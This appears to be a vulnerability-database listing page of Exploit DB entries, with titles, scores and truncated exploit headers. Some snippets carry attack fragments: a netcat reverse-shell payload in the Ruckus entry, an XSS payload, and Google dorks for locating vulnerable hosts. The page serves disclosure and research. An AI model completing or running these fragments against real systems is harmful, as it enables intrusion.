Lucene search
K
ExploitdbMost viewed

47904 matches found

Exploit DB
Exploit DB
added 2020/09/07 12:0 a.m.905 views

ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)

!/usr/bin/python3 Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution Authenticated Google Dork: None Date: 2020-09-04 Exploit Author: Hodorsec Vendor Homepage: https://manageengine.co.uk Vendor Vulnerability Description:...

7.2CVSS7AI score0.35773EPSS
Exploits4
Exploit DB
Exploit DB
added 2004/06/03 12:0 a.m.904 views

SquirrelMail 1.2.x - From Email Header HTML Injection

source: https://www.securityfocus.com/bid/10450/info SquirrelMail is reported to be prone to a 'from' field email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings. An attacker can exploit this issue to...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/04 12:0 a.m.901 views

MiniCMS 1.10 - 'content box' Stored XSS

Exploit Title: MiniCMS 1.10 - 'content box' Stored XSS Date: 2019-7-4 Exploit Author: yudp Vendor Homepage: https://github.com/bg5sbk/MiniCMS Software Link:https://github.com/bg5sbk/MiniCMS Version: 1.10 CVE :CVE-2019-13339 Payload:alert"3: "+document.domain In /MiniCMS/mc-admin/page-edit.php POC...

4.8CVSS5.2AI score0.00631EPSS
Exploits2
Exploit DB
Exploit DB
added 2021/04/06 12:0 a.m.900 views

Google Chrome 86.0.4240 V8 - Remote Code Execution

Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution Exploit Author: r4j0x00 Version: 87.0.4280.88 Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE:...

6.5CVSS7.8AI score0.99595EPSS
Exploits14
Exploit DB
Exploit DB
added 2020/11/16 12:0 a.m.900 views

Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path

Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path Author: Jair Amezcua Date: 2020-11-10 Vendor Homepage: https://www.iobit.com Software Link: https://www.iobit.com/es/advancedsystemcarepro.php Version : 13.0.0.157 Tested on: Windows 10 64bitEN CVE : N/A ...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/16 12:0 a.m.900 views

User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection

Exploit Title: User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection Date: 2020–11–14 Exploit Author: Mayur Parmarth3cyb3rc0p Vendor Homepage: https://phpgurukul.com Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/01/28 12:0 a.m.899 views

WordPress Plugin SuperForms 4.9 - Arbitrary File Upload

Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution Exploit Author: ABDO10 Date : Jan - 28 - 2021 Google Dork : inurl:"/wp-content/plugins/super-forms/" Vendor Homepage : https://renstillmann.github.io/super-forms// Version : All = 4.9.X data in http...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/19 12:0 a.m.897 views

M/Monit 3.7.4 - Password Disclosure

Title: M/Monit 3.7.4 - Password Disclosure Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting to...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2008/08/15 12:0 a.m.896 views

PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion

source: https://www.securityfocus.com/bid/30707/info PHPizabi is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of t...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/03/23 12:0 a.m.895 views

Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path

Exploit Title: Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path Discovery by: Alan Mondragon Discovery Date: 2021-03-23 Vendor Homepage: https://eventlogxp.com/ Software Links : https://eventlogxp.com/ Tested Version: Version: 4.9.3 Vulnerability Type: Unquoted...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/27 12:0 a.m.893 views

WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting

Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting Google Dork: "WonderCMS" Date: 2020-11-27 Exploit Author: SunCSR Sun Cyber Security Research Vendor Homepage: https://www.wondercms.com/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/17 12:0 a.m.892 views

EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass

Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass Date: 17-11-2020 Exploit Author: Kislay Kumar Vendor Homepage: http://egavilanmedia.com Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/ Version:...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2021/07/05 12:0 a.m.890 views

Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)

Exploit Title: Online Voting System 1.0 - SQLi Authentication Bypass + Remote Code Execution RCE Exploit Author: Geiseric Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075 Date 02.07.2021 Vendor Homepage:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2012/03/04 12:0 a.m.889 views

DZCP (deV!L`z Clanportal) Witze Addon 0.9 - SQL Injection

======================================================================================== | Title : deV!Lz Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability | Author : Easy Laster | Download : http://dzcp-zone.de/downloads/?action=show&id=97 | Script : Witze Addon Versions 0.9 | Pric...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2021/01/18 12:0 a.m.888 views

Life Insurance Management System 1.0 - File Upload RCE (Authenticated)

Exploit Title: Life Insurance Management System 1.0 - File Upload RCE Authenticated Date: 15/1/2021 Exploit Author: Aitor Herrero Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/07/27 12:0 a.m.886 views

PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection

Exploit Title: PHP 7.3.15-3 - 'PHPSESSIONUPLOADPROGRESS' Session Data Injection Date: 26/7/2021 Exploit Author: SiLvER | Faisal Alhadlaq Tested on: PHP Version is 7.3.15-3 This poc will abusing PHPSESSIONUPLOADPROGRESS then will trigger race condition to get remote code execution, the script will...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2023/04/05 12:0 a.m.885 views

ImageMagick 7.1.0-49 - Arbitrary File Read

Exploit Title: ImageMagick 7.1.0-49 - Arbitrary File Read Google Dork: N/A Date: 06/02/2023 Exploit Author: Cristian 'void' Giustini Vendor Homepage: https://imagemagick.org/ Software Link: https://imagemagick.org/ Version: = 7.1.0-49 Tested on: 7.1.0-49 and 6.9.11-60 CVE : CVE-2022-44268 CVE...

6.5CVSS7AI score0.89855EPSS
Exploits28
Exploit DB
Exploit DB
added 2020/12/04 12:0 a.m.884 views

Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting

Exploit Title: Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting Date: 3-12-2020 Exploit Author: Parshwa Bhavsar Vendor Homepage: https://compo.sr/ Software Link: https://compo.sr/download.htm Version: 10.0.34 Tested on: Windows 10/ Kali Linux Steps To Reproduce :- 1. Install the CM...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/10/21 12:0 a.m.882 views

Hrsale 2.0.0 - Local File Inclusion

Exploit Title: Hrsale 2.0.0 - Local File Inclusion Date: 10/21/2020 Exploit Author: Sosecure Vendor Homepage: https://hrsale.com/index.php Version: version 2.0.0 Description: This exploit allow you to download any readable file from server with out permission and login session. Payload :...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2016/12/23 12:0 a.m.882 views

Apache mod_session_crypto - Padding Oracle

''' Advisory: Padding Oracle in Apache modsessioncrypto During a penetration test, RedTeam Pentesting discovered a Padding Oracle vulnerability in modsessioncrypto of the Apache web server. This vulnerability can be exploited to decrypt the session data and even encrypt attacker-specified data...

7.5CVSS7.9AI score0.49024EPSS
Exploits4
Exploit DB
Exploit DB
added 2016/03/16 12:0 a.m.882 views

Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)

!/usr/bin/python Cisco UCS Manager 2.11b Shellshock Exploit CVE-2014-6278 Confirmed on version 2.11b, but more are likely vulnerable. Cisco's advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash Exploit generates a reverse shell to a nc listener...

10CVSS9.7AI score0.99621EPSS
Exploits31
Exploit DB
Exploit DB
added 2020/10/20 12:0 a.m.877 views

Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution

Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution Google Dork: ext:action | filetype:action Date: 2020/09/09 Exploit Author: Jonatas Fil Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html Version: = 2.3.15 Tested on: Linux CVE : CVE-2013-2251...

9.8CVSS9AI score0.99998EPSS
Exploits18
Exploit DB
Exploit DB
added 2020/12/11 12:0 a.m.876 views

Openfire 4.6.0 - 'groupchatJID' Stored XSS

Exploit Title: Openfire 4.6.0 - 'groupchatJID' Stored XSS Date: 2020/12/11 Exploit Author: j5s Vendor Homepage: https://github.com/igniterealtime/Openfire Software Link: https://www.igniterealtime.org/downloads/ Version: 4.6.0 POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1 Host:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/17 12:0 a.m.876 views

LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path

Exploit Title: Huawei LCDService 1.0.1.0 - 'LCDService' Unquote Service Path Date: 2020-11-07 Exploit Author: Gerardo González Vendor Homepage: https://consumer.huawei.com/mx Software Link: https://consumer.huawei.com/mx Version: 1.0.1.0 Tested on: Windows 10 Home Single Language x64 Esp Step to...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/06/16 12:0 a.m.876 views

Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path

Exploit Title: Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path Exploit Author: Bobby Cooke Date: 2020-07-15 Vendor Site: https://www.10-strike.com/ Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe Tested On: Windows 10 - Pro 1909 x86...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/04/21 12:0 a.m.876 views

CSZ CMS 1.2.7 - Persistent Cross-Site Scripting

Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.cszcms.com/ Software Link: https://sourceforge.net/projects/cszcms/ Version: v1.2.7 Description: Unauthorized user that has access private message can embed Javascript...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/12/18 12:0 a.m.876 views

Telerik UI - Remote Code Execution via Insecure Deserialization

See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue along with patching instructions. Install git clone...

9.8CVSS9.8AI score0.99737EPSS
Exploits16
Exploit DB
Exploit DB
added 2020/02/13 12:0 a.m.875 views

WordPress Plugin contact-form-7 5.1.6 - Remote File Upload

Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload Author: mehran feizi Category: webapps Date: 2020-02-11 vendor home page: https://wordpress.org/plugins/contact-form-7/ Vulnerable Source: 134: moveuploadedfile moveuploadedfile$file'tmpname', $newfile 82: $file = $FILES$name : null...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/09/03 12:0 a.m.875 views

FileThingie 2.5.7 - Arbitrary File Upload

Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload Author: Cakes Discovery Date: 2019-09-03 Vendor Homepage: www.solitude.dk/filethingie Software Link: https://github.com/leefish/filethingie/archive/master.zip Tested Version: 2.5.7 Tested on OS: CentOS 7 CVE: N/A Intro: Easy arbitrary file...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/27 12:0 a.m.873 views

Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)

Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection Authenticated Exploit Author: SunCSR Sun Cyber Security Research - Nguyen Khang Google Dork: N/A Date: 2020-08-24 Vendor Homepage: https://accesspressthemes.com Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2005/10/10 12:0 a.m.873 views

phpMyAdmin 2.6.4-pl1 - Directory Traversal

!/usr/bin/perl use IO::Socket; SecurityReason.com TEAM Maksymilian Arciemowicz cXIb8O3 [email protected] Local file inclusion ./$FILE simple exploit phpMyAdmin 2.6.4-pl1 SecurityReason.com if @ARGV new Proto = "tcp", PeerAddr = "$HOST", PeerPort = "80" || die "Error 404\r\n\r\n"; print $get...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/04 12:0 a.m.872 views

Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)

Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF Unauthenticated Date: 03/12/2020 Exploit Author: Pankaj Verma p4nk4j Vendor Homepage: https://www.canto.com/integrations/wordpress/ Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin Version: 1.3.0 Tested on: Ubuntu 18.04 CVE...

5.3CVSS5.2AI score0.27771EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/02/24 12:0 a.m.872 views

Android Binder - Use-After-Free (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Android Binder Use-After-Free Exploit", 'Description' = %q , 'License' = MSFLICENSE, 'Author' = 'Jann Horn', discovery and exploit 'Maddie Stone'...

7.8CVSS8.1AI score0.72105EPSS
Exploits28
Exploit DB
Exploit DB
added 2020/11/19 12:0 a.m.870 views

M/Monit 3.7.4 - Privilege Escalation

Title: M/Monit 3.7.4 - Privilege Escalation Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting t...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/04 12:0 a.m.867 views

Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting

Exploit Title: Forma LMS 2.3 - 'First & Last Name' Stored Cross-Site Scripting Date: 04-12-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.formalms.org/download.html Software Link: https://www.formalms.org/ Version: 2.3 Tested on: Windows 10/Kali Linux...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/19 12:0 a.m.865 views

Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification

Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification Google Dork: intitle:"Please Login" "Use FTM Push" Date: 15/11/2020 Exploit Author: Ricardo Longatto Details: This exploit allow change users password from SSLVPN web portal Vendor Homepage:...

9.1CVSS8.4AI score0.81691EPSS
Exploits2
Exploit DB
Exploit DB
added 2021/07/23 12:0 a.m.864 views

ElasticSearch 7.13.3 - Memory disclosure

Exploit Title: ElasticSearch 7.13.3 - Memory disclosure Date: 21/07/2021 Exploit Author: r0ny Vendor Homepage: https://www.elastic.co/ Software Link: https://github.com/elastic/elasticsearch Version: 7.10.0 to 7.13.3 Tested on: Kali Linux CVE : CVE-2021-22145 /usr/bin/python3 from argparse import...

6.5CVSS6.7AI score0.76249EPSS
Exploits6
Exploit DB
Exploit DB
added 2020/11/02 12:0 a.m.863 views

Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)

Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution Javascript API Exploit Author: Nassim Asrir Vendor Homepage: https://www.foxitsoftware.com/ Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker...

7.8CVSS7.8AI score0.39433EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/06/18 12:0 a.m.862 views

Beauty Parlour Management System 1.0 - Authentication Bypass

Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass Google Dork: N/A Exploit Author: Prof. Kailas PATIL krp Date: 2020-06-18 Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ Version: v1.0...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/02/06 12:0 a.m.862 views

Online Job Portal 1.0 - 'user_email' SQL Injection

Exploit Title: Online Job Portal 1.0 - 'useremail' SQL Injection Dork: N/A Date: 2020-02-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/14 12:0 a.m.861 views

WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download

Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download Google Dork: intitle:"Index of" AND "wp-content/plugins/boldgrid-backup/=" Date: 2020-12-12 Exploit Author: Wadeek Vendor Homepage: https://www.boldgrid.com/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/12/11 12:0 a.m.861 views

Supply Chain Management System - Auth Bypass SQL Injection

Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection Date: 2020-12-11 Exploit Author: Piyush Malviya Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/10/30 12:0 a.m.861 views

Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution

Exploit Title: Simple College Website 1.0 - SQL Injection / Remote Code Execution Date: 30-10-2020 Exploit Author: yunaranyancat Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/11/27 12:0 a.m.860 views

Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution

Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...

9CVSS7AI score0.11453EPSS
Exploits3
Exploit DB
Exploit DB
added 2020/11/02 12:0 a.m.860 views

WordPress Plugin Simple File List 4.2.2 - Arbitrary File Upload

!/usr/bin/python -- coding: utf-8 -- Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Arbitrary File Upload Date: 2020-11-01 Exploit Author: H4rk3nz0 based off exploit by coiffeur Original Exploit: https://www.exploit-db.com/exploits/48349 Vendor Homepage: https://simplefilelist.com/...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/10/25 12:0 a.m.857 views

phpMyAdmin 4.8.1 - Remote Code Execution (RCE)

Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution RCE Date: 17/08/2021 Exploit Author: samguy Vulnerability Discovery By: ChaMd5 & Henry Huang Vendor Homepage: http://www.phpmyadmin.net Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE481.tar.gz Version: 4.8.1 Tested o...

8.8CVSS8.8AI score0.98462EPSS
Exploits21
Exploit DB
Exploit DB
added 2021/04/01 12:0 a.m.855 views

ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)

Exploit Title: ScadaBR 1.0 - Arbitrary File Upload Authenticated 1 Date: 03/2021 Exploit Author: Fellipe Oliveira Vendor Homepage: https://www.scadabr.com.br/ Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux Tested on: Windows7, Windows10 !/usr/bin/python import requests,sys,time if...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2014/04/24 12:0 a.m.854 views

OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support)

/ CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted SSL packets and is then decrypted...

7.5CVSS7.8AI score0.99999EPSS
Exploits88
Exploit DB
Exploit DB
added 2020/12/11 12:0 a.m.852 views

Openfire 4.6.0 - 'users' Stored XSS

Exploit Title: Openfire 4.6.0 - 'users' Stored XSS Date: 2020/12/11 Exploit Author: j5s Vendor Homepage: https://github.com/igniterealtime/Openfire Software Link: https://www.igniterealtime.org/downloads/ Version: 4.6.0 POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1 Host: 192.168.137.137:90...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2020/01/22 12:0 a.m.852 views

Citrix XenMobile Server 10.8 - XML External Entity Injection

Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection Google Dork: inurl:zdm logon Date: 2019-11-28 Exploit Author: Jonas Lejon Vendor Homepage: https://www.citrix.com Software Link: Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3 Tested on: XenMobile CVE :...

9.8CVSS7AI score0.06801EPSS
Exploits4
Total number of security vulnerabilities5000